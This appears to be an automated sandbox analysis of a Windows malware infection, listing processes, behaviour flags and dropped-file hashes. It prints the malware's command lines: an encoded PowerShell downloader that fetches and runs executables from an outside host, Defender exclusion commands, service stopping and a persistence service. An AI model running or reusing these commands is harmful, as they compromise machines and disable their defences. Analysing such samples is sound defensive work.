2472 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2480 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2628 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2680 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2704 2192 dialer.exe sysmon.exe PID 2192 wrote to memory of 2748 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2756 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2960 2192 dialer.exe unsecapp.exe PID 2192 wrote to memory of 3000 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 3012 2192 dialer.exe sihost.exe PID 2192 wrote to memory of 2060 2192 dialer.exe taskhostw.exe PID 2192 wrote to memory of 2744 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 3340 2192 dialer.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\gpldtnem.g1w2.exe"C:\Users\Admin\AppData\Roaming\gpldtnem.g1w2.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\gpldtnem.g1w3.exe"C:\Users\Admin\AppData\Roaming\gpldtnem.g1w3.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd6d08ab58,0x7ffd6d08ab68,0x7ffd6d08ab783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2312 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3664 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4560 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4708 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4760 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4884 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5108 --field-trial-handle=1968,i,9345720732479062442,13392461635050086330,131072 /prefetch:13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006Filesize
203KB
MD599916ce0720ed460e59d3fbd24d55be2
SHA1d6bb9106eb65e3b84bfe03d872c931fb27f5a3db
SHA25607118bf4bbc3ba87d75cbc11ddf427219a14d518436d7f3886d75301f897edaf
SHA5128d3d52e57806d1850b57bffee12c1a8d9e1a1edcf871b2395df5c889991a183a8d652a0636d5452068f5ef78d37e08ce10b2b2f4e05c3e3c0f2f2230310418a8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
168B
MD57f06f9a19c6674d1b93371c3c0d4743d
SHA188ab9da59b430a56aa140fe10c1c710c75d8097c
SHA2560e804fc701f75b5f8c105ca98b0d8770fd4b2bdce747263eead9fb3968363935
SHA5125145f3c9b6665c6bdb68f7828af43bf3a7b7e5963855f60bb3fb39aec910e1696d7ecb4322db2cae0171db583aff790ea67451537d12f80bd6ca78c6eacebd92
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
168B
MD5a0b85b4f578dd9cf683b4631399c3c6d
SHA1fe64aaf6fa19b9df573e0cb75451dfceb8fa9266
SHA25639d35f4c2b9be6b7b96956697187f36d30e1965f26b12c5ed0aa39623d93f492
SHA512dd861e16a259e7d278917e532f01c65ed9f5fcec30e3707fe4de0d855766fcbb743dad00556ba3841e119b70438632810ec9105cceedf9007aa9cbbde5fc798d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD55469398680690d9729f91bbf9f843bf8
SHA1f036fb2bed725204f12c2bed9e51425003fdadfe
SHA256686c205613d322f892ee961189384e5aeedeb731fce90ec3ab824ebedb54a2f7
SHA512730e3ec30eb7d0be043dccd056d24b41fde88a3bb9aff2caecbd10bc7fe9106c5f3dd77ebd64b97abde3589e3f97a0e1110d3001d13d2b5b1fafa054ea7a649c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
356B
MD5f2a20b01a9b6903a17975816afdb56d3
SHA199e0c008448333ba26edf2bdf8f0cea8903613b1
SHA256f00a92e432bebc27a50e637946186017bad7375d33a2ec797743560942796327
SHA51236e2d860d0f5a9bc3a943b0ca5d738d527c3f66cf2bde8541ff2e60cbb339d7f46e6caf494433a2d9360e39e240673f4c6f278805a8a87569f6d4c9d03de8579
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
356B
MD5ab4047becee9736efa67d65e9e73d818
SHA19c92151856204735012c15636e51095b62ee865b
SHA256c453c5a3568cba6ed7ec78fc284834162ba6a5ae97f7f6796b90cb798b42c935
SHA512adf59778a08f55e3502d2648e4698cf10f181a53145c6ed0ec8a11bc012064be1cd2407fce8743bf5e766b1695fe84743b07c76c7812871f2b43244fb5e7938d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5fb10eeed8a68833b694a33d16a20ede7
SHA18a2d204c0867580f647ab1542dcd8c298e9d3afd
SHA256189b803f35be6a61d9a74f9ef75656997824abdada467226d27f57fe424339e9
SHA512ee81eb2fb0b95e32c9f0d235c3215bb6af47d4e46ba4f7289fdaff9f9864297ba8ffd047077957ed0761f43b90f81fe3eb48f35936a1f333107b3850d1d87022
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD5c50e783c0c98a58301a38023f43bff3b
SHA1beaf36d2ae1fe91116a28efb5a02049354e8fe93
SHA256bc9f32e23d9e6222f9db23d69ebab88c717fb7505866f9ce3aa4819f3c1bce75
SHA512c0c18f5ddc5d812842ef984f205a3e12e781c7281bbb49cfec7b1c0924f8f5efa8a9853896d8d63517c2b9e732043f18c893598adbae0e2e3fced707646844b5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD5a4593eabdfca9562e8f4e0bf21f699f1
SHA14e81fbb888a14481d5d14df309ea8a40df1293aa
SHA256a889d6ad6259ff8ba517ea098eec7c87be41c167c89353d03af9e9ccdbb82e54
SHA512c5346b496e08cebe783e942a9bec2df0ff5fba59b2fae958a0d7039af864d09db298c674e2dec06a7a6336674b54318a47065688cabf2479e6727e7eb417249a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
16KB
MD55a663beebe38b63f1553aefcf1d3a204
SHA181af50176555af9e8c6e05c9998efc01c07cc674
SHA256f5f0e7dc66fa12fd7d8de028dc37b900fefdd373205632ef13c7f20ee8bb4ea9
SHA51200657f59c79357dea6afc661bbda170adbdca7f27a775640d5e4ccda9843d2bf9943e6746b1197c66ec51ab681b528b2bf5f15e6e920d8d0293930638ca8a0aa
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
276KB
MD59f4a819381577ef364babc40e61f409d
SHA1f69efd027c6165031f96c2cc612b37425d2824a8
SHA256d97e66bf572983e48342e40fefcf9963ff63b052145dd6f42531834db4e94017
SHA512342d303d1ad5615751e6a0473dc99b1d8763508a94687119a01db0f3fa291643ff5bf23ca7ca171838324a840594fd52702580344f03f4a4eb02637639b2ee8f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5806286a9ea8981d782ba5872780e6a4c
SHA199fe6f0c1098145a7b60fda68af7e10880f145da
SHA256cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713
SHA512362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4k0qe5fy.0kj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\gpldtnem.g1w2.exeFilesize
355KB
MD5c93d65bc0ed7ee88d266b4be759301f8
SHA18c0c415ba824737c61904676e7132094f5710099
SHA256f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f
SHA5127a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1
-
C:\Users\Admin\AppData\Roaming\gpldtnem.g1w3.exeFilesize
5.2MB
MD5f55fc8c32bee8f7b2253298f0a0012ba
SHA1574c7a8f3eb378c03f58bc96252769296b20970e
SHA256cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
SHA512c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
-
\??\pipe\crashpad_4340_MZIIPSFCYBBMUQDOMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/384-91-0x00007FFD4A970000-0x00007FFD4A980000-memory.dmpFilesize
64KB
-
